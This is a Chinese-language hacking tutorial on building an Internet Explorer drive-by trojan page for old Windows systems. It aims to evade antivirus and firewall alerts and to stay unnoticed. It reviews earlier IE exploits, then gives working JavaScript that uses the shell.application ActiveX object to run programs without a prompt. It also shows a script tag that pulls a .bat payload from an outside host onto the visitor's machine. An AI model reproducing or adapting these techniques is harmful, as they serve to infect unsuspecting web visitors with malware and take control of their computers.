既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征:
一:可以躲过杀毒软件的追杀;
二:可以避开网络防火墙的报警;
三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WINME、WIN2000、WINXP、WIN2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP补丁;
四:让浏览者不容易发觉IE变化,即可以悄无声息,从而可以长久不被发现。
(注意以上四点只是指网页本身而言,但不包括你的木马程序,也就是说我们的网页木马只是负责运行指定的木马程序,至于你的木马程序的好坏只有你自己去选择啦!别找我要,我不会写的哦!)
满足以上四点我想才可以让你的马儿更青春更长久,跑的更欢更快……
看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足吧!
第一种:利用古老的MIME漏洞的IE网页木马这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影响又太大,补丁差不多都补上啦,因此这种木马的种植成功率比较低。
第二种:利用com.ms.activeX.ActiveXComponent漏洞,结合WSH及FSO控件的IE网页木马虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数IE版本中,是一个比较好的漏洞,利用价值非常高,但却因为它结合了流行的病毒调用的WSH及FSO控件,使其虽说可以避开网络防火墙的报警,可逃不脱杀毒软件的追捕(如诺顿)。
第三种:利用OBJECT对象类型确认漏洞(Object Data Remote)并结合WSH及FSO控件的IE网页木马(典型的代表有动鲨网页木马生成器)
此种木马最大的优点是适应的IE版本多,且漏洞较新,但却有如下不足:
1、因为此漏洞要调用Mshta.exe来访问网络下载木马程序,所以会引起防火墙报警(如天网防火墙);
2、如果此IE网页木马又利用了WSH及FSO控件,同样逃不脱杀毒软件的追捕(如诺顿),而动鲨网页木马又恰恰使用了WSH及FSO控件,叹口气……可惜呀……?
3、再有就是这个漏洞需要网页服务器支持动态网页如ASP、JSP、CGI等,这就影响了它的发挥,毕竟现在的免费稳定的动态网页空间是少之又少;虽说此漏洞也可利用邮件MIME的形式(见我在安全焦点上发表的文章:《由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html)来利用,但经测试发现对IE6.0不起作用。
看到上面的分析你是不是有了这种感觉:千军易得,一将难求,马儿成群,奈何千里马难寻!别急,下面让我带这大家一起打造我心中的完美IE网页木马。
首先要躲过杀毒软件的追杀,我们就不能利用WSH和FSO控件,因为只要利用了WSH和FSO控件就一定逃不脱“诺顿”的追杀,这可叫我们该如何是好?!别急,经过我的努力工作(说真的我也是在研究ASP木马时偶然发现的灵感)终于我有找到了一个可以用的控件,那就是shell.application,并且它可是经过了安全认证的,可以在“我的电脑”域中的网页中畅通无阻的执行,比WSH和FSO更容易得到执行权限(利用跨域漏洞即可),请看下面javascript代码:
<SCRIPT LANGUAGE="javascript" type="text/javascript">
var shell=new ActiveXObject("shell.application");
shell.namespace("c:\Windows\").items().item("Notepad.exe").invokeverb();
</SCRIPT>
保存为test.htm后打开看是否自动打开了记事本程序,而且不会象WSH和FSO那样出现是否允许运行的提示框,是不是有点兴趣啦?现在我们已可以运行所有已知路径的程序,但我们要求运行我们自己的木马程序,所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决:
1、下载木马程序到浏览者的电脑中
这一点可以有很多解决方法,比如我以前提到的WINDOWS帮助文件访问协议下载任意文件漏洞(its:),不过这次我们不用它,再教大家两个更好的下载方法:
例一:利用SCRIPT标签,代码如下:
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
